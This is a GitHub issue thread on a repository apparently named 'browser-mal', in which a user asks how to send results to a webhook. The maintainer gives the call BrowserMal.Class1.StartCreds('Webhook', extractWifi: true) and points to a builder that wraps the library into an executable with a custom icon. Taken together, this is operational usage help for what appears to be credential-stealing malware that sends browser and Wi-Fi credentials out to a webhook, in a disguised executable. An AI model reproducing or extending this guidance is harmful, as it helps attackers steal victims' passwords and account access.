### ISSUE TITLE
Webhook

### ISSUE THREAD

**Issue by cron992** [miltinhoc/browser-mal#1]
How can I send to webhook?

**Comment by miltinhoc** [comment]
Hi, you can either compile dll and then import it as a reference to another project and invoke the method like this: 
`BrowserMal.Class1.StartCreds("Webhook", extractWifi: true);` 
or if you don't want to have to create another project, you can use the builder that I made here:
https://github.com/miltinhoc/Crumbly-Grabber

this already uses the dll and gives you a executable with costum icon
